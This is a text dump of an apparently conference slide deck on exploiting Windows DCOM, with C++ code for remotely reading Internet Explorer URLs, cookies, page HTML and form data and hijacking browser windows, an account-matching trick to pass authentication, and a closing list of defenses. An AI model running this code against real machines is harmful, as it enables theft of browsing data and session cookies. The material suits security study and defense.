Date post: | 09-Apr-2018 |
Category: |
Documents |
Upload: | anonymous-tvpppp |
View: | 219 times |
Download: | 0 times |
of 86
8/8/2019 Bh Win 03 Security Friday
1/86
Exploiting DCOM
Yoshiaki Komoriya
Hidenobu [email protected]
8/8/2019 Bh Win 03 Security Friday
2/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstrationDCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
3/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstrationDCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
4/86
Distributed COM
Application-level protocol for object-
oriented remote procedure call.
For constructing applications on
distributed computing environment.
DCOM is a seamless evolution ofCOM
according to Microsoft.
8/8/2019 Bh Win 03 Security Friday
5/86
COM technology
Components oriented programming
model ofMicrosoft.
Can develop reusable programs by
using COM.
8/8/2019 Bh Win 03 Security Friday
6/86
COM model
ClientProgram
Component
Interface
COMcomponents
8/8/2019 Bh Win 03 Security Friday
7/86
DCOM
ClientProgram
Local PC
COMComponent
network
Distributed apps by using DCOM
DCOM
Remote PC
8/8/2019 Bh Win 03 Security Friday
8/86
DCOM model
ClientProgram
Local PC
COM
component
Remote PC
DCOMRuntime
DCOMRuntime
DCOMProtocol
network
8/8/2019 Bh Win 03 Security Friday
9/86
DCOM runtime
Installed by default
Windows XP, 2k, (98, Me)
Not installed by default
Windows NT
But installed with other apps (ex. IE)
8/8/2019 Bh Win 03 Security Friday
10/86
DCOMCNFG.exe
DCOM Configuration Tool
View installed DCOM-enableapplications list.
8/8/2019 Bh Win 03 Security Friday
11/86
List of DCOM-enabled apps
DCOM-enabledapps
8/8/2019 Bh Win 03 Security Friday
12/86
Windows Built-in DCOM Apps
Internet Explorer
Windows media player
Windows Scripting Host
Sound recorder
WordPad
and more
8/8/2019 Bh Win 03 Security Friday
13/86
Other Applications
Word
Excel
Outlook
PowerPoint
and more
8/8/2019 Bh Win 03 Security Friday
14/86
COM components on Windows
Windows has many COM components.
Registered under
\HKEY_CLASSES_ROOT\CLSID onthe registry.
8/8/2019 Bh Win 03 Security Friday
15/86
COM components in Registry
8/8/2019 Bh Win 03 Security Friday
16/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
DCOM authentication
MS-Word exploit demonstration
DCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
17/86
IEen
Original IE exploit tool
Steal IEs data
Hijack IE
Can download fromwww.securityfriday.com
8/8/2019 Bh Win 03 Security Friday
18/86
IEen
Local PC Remote PC
DCOM DCOM
network
Browsing URLsBrowsing contentsand more..
Create new window
Change browsing pageand more
8/8/2019 Bh Win 03 Security Friday
19/86
Demonstration environment
Local PC
Windows XP
Remote PC
Windows 2k Professional ( Default )
8/8/2019 Bh Win 03 Security Friday
20/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstration
DCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
21/86
Exploit code
Stealing IEs data
Hijacking IE
8/8/2019 Bh Win 03 Security Friday
22/86
Exploit code
Stealing IEs data
Hijacking IE
8/8/2019 Bh Win 03 Security Friday
23/86
Stealing IEs data
Browsing URL lists
Incoming data
Cookies
HTML contents
Navigation events
Get parameters
Post Parameters
8/8/2019 Bh Win 03 Security Friday
24/86
Stealing IEs data
Browsing URL lists
Incoming data
Cookies
HTML contents
Navigation events
Get parameters
Post Parameters
8/8/2019 Bh Win 03 Security Friday
25/86
Browsing URL list
1. Activate ShellWindows componenton remote PC.
2. Get IDispatch intarfaces fromIShellWindows interface.
3. GetIWebBrowser2 interfaces fromIDispatch interface.
4. Get browsing URL strings fromIWebBrowser2.
8/8/2019 Bh Win 03 Security Friday
26/86
Activate ShellWindows// Initialize COM runtime
HRESULT hret = CoInitialize(NULL);
// Create COSERVERINFO structure contain remote PC IPCOSERVERINFO ServerInfo;ServerInfo.dwReserved1 = 0;ServerInfo.dwReserved2 = 0;ServerInfo.pwszName = L"RemotePC";ServerInfo.pAuthInfo = NULL;
// Get aIShellWindows
interface from remote PC
MULTI_QI qi = {&IID_IShellWindows, NULL, 0};hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL,
CLSCTX_SERVER, &ServerInfo, 1, &qi);IShellWindows *windows = (IShellWindows*)qi.pItf;
8/8/2019 Bh Win 03 Security Friday
27/86
Activate ShellWindows// Initialize COM runtime
HRESULT hret = CoInitialize(NULL);
// Create COSERVERINFO structure contain remote PC IPCOSERVERINFO ServerInfo;ServerInfo.dwReserved1 = 0;ServerInfo.dwReserved2 = 0;ServerInfo.pwszName = L"RemotePC";ServerInfo.pAuthInfo = NULL;
// Get aIShellWindows
interface from remote PC
MULTI_QI qi = {&IID_IShellWindows, NULL, 0};hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL,
CLSCTX_SERVER, &ServerInfo, 1, &qi);IShellWindows *windows = (IShellWindows*)qi.pItf;
8/8/2019 Bh Win 03 Security Friday
28/86
Activate ShellWindows// Initialize COM runtime
HRESULT hret = CoInitialize(NULL);
// Create COSERVERINFO structure contain remote PC IPCOSERVERINFO ServerInfo;ServerInfo.dwReserved1 = 0;ServerInfo.dwReserved2 = 0;ServerInfo.pwszName = L"RemotePC";ServerInfo.pAuthInfo = NULL;
// Get aIShellWindows
interface from remote PC
MULTI_QI qi = {&IID_IShellWindows, NULL, 0};hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL,
CLSCTX_SERVER, &ServerInfo, 1, &qi);IShellWindows *windows = (IShellWindows*)qi.pItf;
8/8/2019 Bh Win 03 Security Friday
29/86
Get IDispatch
// Get num of IE window by using IShellWindowslong nCount;hret = windows->get_Count(&nCount);
for(long i = 0; i < nCount; ++i){
// Get IDispatch interfaces from IShellWindowsIDispatch *disp = NULL;
VARIANT va; VariantInit(&va);
V_VT(&va) = VT_I4; V_I4(&va) = i;hret = windows->Item(va,&disp);VariantClear(&va);
8/8/2019 Bh Win 03 Security Friday
30/86
Get IDispatch
// Get num of IE window by using IShellWindowslong nCount;hret = windows->get_Count(&nCount);
for(long i = 0; i < nCount; ++i){
// Get IDispatch interfaces from IShellWindowsIDispatch *disp = NULL;
VARIANT va; VariantInit(&va);
V_VT(&va) = VT_I4; V_I4(&va) = i;hret = windows->Item(va,&disp);VariantClear(&va);
8/8/2019 Bh Win 03 Security Friday
31/86
Get IDispatch
// Get num of IE window by using IShellWindowslong nCount;hret = windows->get_Count(&nCount);
for(long i = 0; i < nCount; ++i){
// Get IDispatch interfaces from IShellWindowsIDispatch *disp = NULL;
VARIANT va; VariantInit(&va);
V_VT(&va) = VT_I4; V_I4(&va) = i;hret = windows->Item(va,&disp);VariantClear(&va);
8/8/2019 Bh Win 03 Security Friday
32/86
Get IWebBrowser2
// Get IWebBrowser2 interfaces from IDispatchIWebBrowser2 *browser = NULL;
if(disp != NULL){
hret = disp->QueryInterface(IID_IWebBrowser2,(void**)&browser);}
8/8/2019 Bh Win 03 Security Friday
33/86
Get browsing URL strings
// Get browsing URL stringif(browser != NULL){BSTR url;
hret = browser->get_LocationName(&url);}
}
8/8/2019 Bh Win 03 Security Friday
34/86
Stealing IEs data
Browsing URL list
Incoming data
Cookie
HTML Contents
Navigation events
Get parameters
Post Parameters
8/8/2019 Bh Win 03 Security Friday
35/86
Incoming data
cookie1. GetIHTMLDocument2 interface from
IWebBrowser2.2. Call get_cookie method of IHTMLDocument2.
HTML1. GetIHTMLElement interface from
IHTMLDocument2.2. Call get_outerHTML method of IHTMLElement.
8/8/2019 Bh Win 03 Security Friday
36/86
Get cookie
// Get IHTMLDocument2 from IWebBrowser2IDispatch *htmlDisp = NULL;hret = browser->get_Document(&htmlDisp);IHTMLDocument2 *doc = NULL;
if(htmlDisp != NULL){hret = htmlDisp->QueryInterface(IID_IHTMLDocument2,
(void**)&doc);}
// Call get_cookie method of IHTMLDocument2if(theIHD != NULL){BSTR cookie;hret = doc->get_cookie(&cookie);
}
8/8/2019 Bh Win 03 Security Friday
37/86
Get cookie
// Get IHTMLDocument2 from IWebBrowser2IDispatch *htmlDisp = NULL;hret = browser->get_Document(&htmlDisp);IHTMLDocument2 *doc = NULL;
if(htmlDisp != NULL){hret = htmlDisp->QueryInterface(IID_IHTMLDocument2,
(void**)&doc);}
// Call get_cookie method of IHTMLDocument2if(theIHD != NULL){BSTR cookie;hret = doc->get_cookie(&cookie);
}
8/8/2019 Bh Win 03 Security Friday
38/86
Get cookie
// Get IHTMLDocument2 from IWebBrowser2IDispatch *htmlDisp = NULL;hret = browser->get_Document(&htmlDisp);IHTMLDocument2 *doc = NULL;
if(htmlDisp != NULL){hret = htmlDisp->QueryInterface(IID_IHTMLDocument2,
(void**)&doc);}
// Call get_cookie method of IHTMLDocument2if(theIHD != NULL){
BSTR cookie;hret = doc->get_cookie(&cookie);
}
8/8/2019 Bh Win 03 Security Friday
39/86
Get HTML
// Get IHTMLElement from IHTMLDocument2IHTMLElement *element = NULL;hret = doc->get_body(&element);
// Call get_outerHTML of IHTMLElementif(element != NULL){BSTR html;hret = element->get_outerHTML(&html);
}
8/8/2019 Bh Win 03 Security Friday
40/86
Get HTML
// Get IHTMLElement from IHTMLDocument2IHTMLElement *element = NULL;hret = doc->get_body(&element);
// Call get_outerHTML of IHTMLElementif(element != NULL){BSTR html;hret = element->get_outerHTML(&html);
}
8/8/2019 Bh Win 03 Security Friday
41/86
Get HTML
// Get IHTMLElement from IHTMLDocument2IHTMLElement *element = NULL;hret = doc->get_body(&element);
// Call get_outerHTML of IHTMLElementif(element != NULL){BSTR html;hret = element->get_outerHTML(&html);
}
8/8/2019 Bh Win 03 Security Friday
42/86
Stealing IEs data
Browsing URL list
Incoming data
Cookie
HTML Contents
Navigation events
Get parameters
Post Parameters
8/8/2019 Bh Win 03 Security Friday
43/86
Navigation events
Client Program
IEEvent Handler
NavigationEvents
8/8/2019 Bh Win 03 Security Friday
44/86
Navigation events
1. Create event handler implementingDWebBrowserEvents interface.
2. GetIConnectionPoint interfacethrough IWebBrowser2.
3. Advise IE where the event handler is
by using IConnectionPoint.
8/8/2019 Bh Win 03 Security Friday
45/86
Members of DWebBrowserEvents
BeforeNavigate CommandStateChange
DownloadBegin DownloadComplete
NavigateComplete New indow
OnQuit ProgressChange
PropertyChange StatusTextChange
TitleChange indowActivate
indowMove indowResize
8/8/2019 Bh Win 03 Security Friday
46/86
BeforeNavigate
void BeforeNavigate(
IDispatch* pDisp,
VARIANT* &url, // the new URL to be navigate to
VARIANT* &Flag,
VARIANT* &TargetFrameName,
VARIANT* &PostData,
// the POST data to send to the new URL
VARIANT* &Headers,
VARIANT_BOOL* &Cancel
);
8/8/2019 Bh Win 03 Security Friday
47/86
BeforeNavigate
void BeforeNavigate(
IDispatch* pDisp,
VARIANT* &url, // the new URL to be navigate to
VARIANT* &Flag,
VARIANT* &TargetFrameName,
VARIANT* &PostData,
// the POST data to send to the new URL
VARIANT* &Headers,
VARIANT_BOOL* &Cancel
);
8/8/2019 Bh Win 03 Security Friday
48/86
BeforeNavigate
void BeforeNavigate(
IDispatch* pDisp,
VARIANT* &url, // the new URL to be navigate to
VARIANT* &Flag,
VARIANT* &TargetFrameName,
VARIANT* &PostData,
// the POST data to send to the new URL
VARIANT* &Headers,
VARIANT_BOOL* &Cancel
);
8/8/2019 Bh Win 03 Security Friday
49/86
Get IConnectionPoint
IConnectionPointContainer* container;
hret = browse->QueryInterface(
IID_IConnectionPointContainer,(void**)&container);
IConnectionPoint* point;
hret = container->FindConnectionPoint(
IID_DWebBrowserEvents,
&point);
8/8/2019 Bh Win 03 Security Friday
50/86
Advise IE
Sink *sink = new Sink;
DWORD dwCookie;
hret = point->A
dvise(sink->GetIDispatch(false),&dwCookie);
8/8/2019 Bh Win 03 Security Friday
51/86
Hijacking IE
Change browsing pages
Make IE windows invisible
Create new windows
8/8/2019 Bh Win 03 Security Friday
52/86
Change browsing pages
BSTR newURL;newURL = SysAllocString(L"http://www.yahoo.co.jp");hret = browser->Navigate(newURL);
8/8/2019 Bh Win 03 Security Friday
53/86
Make IE windows invisible
browser->put_Visible((VARIANT_BOOL)false);
8/8/2019 Bh Win 03 Security Friday
54/86
Create new windows
COSERVERINFO ServerInfo2;ServerInfo.dwReserved1 = 0;ServerInfo.dwReserved2 = 0;ServerInfo.pwszName = L"RemotePC";ServerInfo.pAuthInfo = NULL;
MULTI_QI qi2 = {&IID_IWebBrowser2, NULL, 0};hret = CoCreateInstanceEx(
CLSID_InternetExplorer, NULL,CLSCTX_SERVER, &ServerInfo, 1, &qi);
IWebBrowser2 *browser2 = (IWebBrowser2*)qi2.pItf;
8/8/2019 Bh Win 03 Security Friday
55/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstration
DCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
56/86
Authentication
Component activation procedures
Two steps of authentication
Event handling & Authentication
Exploit code
Special case: XP
8/8/2019 Bh Win 03 Security Friday
57/86
Authentication
Component activation procedures
Two steps of authentication
Event handling & Authentication
Exploit code
Special case: XP
8/8/2019 Bh Win 03 Security Friday
58/86
Component activation procedure
LocalPC
RemotePC
1. NEGOTIATE
2. CHALLENGE
3. RESPONSE
4. CLSID
5. Results
8/8/2019 Bh Win 03 Security Friday
59/86
Authentication
Component activation procedure
Two steps of authentication
Event handling & Authentication
Exploit code
Special case: XP
8/8/2019 Bh Win 03 Security Friday
60/86
Two steps of authentication
Logonaudit
DCOMauthentication
ComponentClientProgram
Remote PC
8/8/2019 Bh Win 03 Security Friday
61/86
Logon audit 1/2
LogonAudit
DCOMAuthentication
Component
Remote PC
Bill
XClientProgram
MikeZev
Joe
8/8/2019 Bh Win 03 Security Friday
62/86
Logon audit 2/2
LogonAudit
DCOMAuthentication
Component
Remote PC
Joe
ClientProgram
MikeZev
Joe
8/8/2019 Bh Win 03 Security Friday
63/86
DCOM authentication
Launch / Access control listControl launch / access permission
RunAs parameterAccount used to launch / access tocomponents
8/8/2019 Bh Win 03 Security Friday
64/86
DCOM authentication
LogonAudit
DCOMAuthentication
Component
Remote PC
ClientProgram
RunAsAccount
ACL
8/8/2019 Bh Win 03 Security Friday
65/86
Default setting of DCOM authentication
Launch / Access control list
SYSTEM, Administrators, INTERACTIVE
RunAs The launching user
8/8/2019 Bh Win 03 Security Friday
66/86
Authentication
Component activation procedure
Two steps of authentication
Event handling & Authentication
Exploit code
Special case: XP
8/8/2019 Bh Win 03 Security Friday
67/86
Event handling model
Client Program
ComponentEvent Handler
NavigationEvents
8/8/2019 Bh Win 03 Security Friday
68/86
Reverse authentication
LogonAudit
DCOMAuthentication
Component
Local PC
Eventhandler
Client Program
8/8/2019 Bh Win 03 Security Friday
69/86
Authentication
Component activation procedure
Two steps of authentication
Event handling & Authentication
Exploit code
Special case: XP
8/8/2019 Bh Win 03 Security Friday
70/86
Exploit code
1. Set an account on local PC.
2. Create client process with new
accounts security context.
8/8/2019 Bh Win 03 Security Friday
71/86
1. Set account on local PC
// Create USER_INFO_1 structureUSER_INFO_1 ui;ui.usri1_name = USERNAME;ui.usri1_password = PASSWORD;
ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;
// Add new user to systemNetUserAdd(NULL, 1, (LPBYTE)&ui, NULL);
8/8/2019 Bh Win 03 Security Friday
72/86
1. Set account on local PC
// Create USER_INFO_1 structureUSER_INFO_1 ui;ui.usri1_name = USERNAME;ui.usri1_password = PASSWORD;
ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;
// Add new user to systemNetUserAdd(NULL, 1, (LPBYTE)&ui, NULL);
8/8/2019 Bh Win 03 Security Friday
73/86
1. Set account on local PC
// Create USER_INFO_1 structureUSER_INFO_1 ui;ui.usri1_name = USERNAME;ui.usri1_password = PASSWORD;
ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;
// Add new user to systemNetUserAdd(NULL, 1, (LPBYTE)&ui, NULL);
8/8/2019 Bh Win 03 Security Friday
74/86
2. Create client process
PROCESS_INFORMATION process;
STARTUPINFOW startup;startup.dwFlags = STARTF_USESHOWWINDOW;
startup.wShowWindow = SW_SHOWNORMAL;
CreateProcessWithLogonW(USERNAME, NULL,PASSWORD, 0,NULL, EXPLOIT.exe, 0, NULL,
CURRENTDIR, &startup, &process);
8/8/2019 Bh Win 03 Security Friday
75/86
Special case: XP
New security model.
Cannot exploit with XP default setting.
8/8/2019 Bh Win 03 Security Friday
76/86
Special case: XP
LogonAudit
DCOMAuthentication
componentclient
Auser
guest
ACL
Remote PC
ClientProgram
8/8/2019 Bh Win 03 Security Friday
77/86
Use classic security model 1/2
8/8/2019 Bh Win 03 Security Friday
78/86
Use classic security model 2/2
8/8/2019 Bh Win 03 Security Friday
79/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstration
DCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
80/86
Trojan Office
Local PC Remote PC
DCOM DCOM
network
Get recent files list
Open a document
Change a document
8/8/2019 Bh Win 03 Security Friday
81/86
Demonstration environment
Local PC
Windows XP
Remote PC Windows 2k Professional
8/8/2019 Bh Win 03 Security Friday
82/86
Agenda
COM and DCOM technology
IE exploit demonstration
Exploit code
Authentication
MS-Word exploit demonstration
DCOM exploit prevention
8/8/2019 Bh Win 03 Security Friday
83/86
DCOM exploit prevention
1. Filter port 135.
2. Disable DCOM.
3. Use a strong password orpass phrase.
8/8/2019 Bh Win 03 Security Friday
84/86
Conclusion
Reveal the risks of DCOM with exploitdemonstrations.
Show the DCOM exploit techniques.Explain how to defend ourselves.
8/8/2019 Bh Win 03 Security Friday
85/86
FAQQ: IEen doesnt work well on domain environment.
A: Latest version of IEen works.
Q: Why is the alert message displayed when"Contents" box is clicked?
A: The system sometimes goes down. I thinkget_outerHTML method has a memory leak,
Even if I use SysFreeString every time.
Q: Connection fails with Class not registered
message.A: Check the user name and password.
8/8/2019 Bh Win 03 Security Friday
86/86
Reference
DCOM Technical Overviewhttp://msdn.microsoft.com/library/en-us/dndcom/html/msdn_dcomtec.asp
WebBrowser Controlhttp://msdn.microsoft.com/workshop/browser/webbrowser/reflist_cpp.asp
ShellWindows Objecthttp://msdn.microsoft.com/library/en-us/shellcc/platform/shell/reference/objects/shellwindows/shellwindows.asp
and others.